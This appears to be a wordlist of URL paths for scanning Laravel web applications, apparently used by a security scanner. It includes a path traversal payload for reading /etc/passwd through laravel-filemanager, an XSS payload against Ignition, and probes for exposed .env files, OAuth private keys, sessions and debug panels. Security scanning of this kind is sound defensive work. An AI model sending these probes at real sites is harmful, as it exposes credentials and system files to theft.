/.env
{{paths}}
/storage/logs/laravel.log
/_ignition/scripts/--><svg%20onload=alert(document.domain)>
/laravel-filemanager?type=Files

/composer.json
/composer.lock
/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd
/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd
/telescope/requests
/_ignition/health-check
///////this-should-not-exist,.<>!@#$%^&*()_+
/%00
/api/stats
/horizon/api/stats
/storage/framework/sessions/
/storage/sessions/
/asf/terminal
/
/{{trim_prefix(update_uri,
/admin/login
/authentication/login
/login
/nova/dashboards/main
/nova/resources
/storage/oauth-private.key
/storage/oauth-public.key
/_ignition/logs
/__clockwork
/_debugbar/open
/pulse
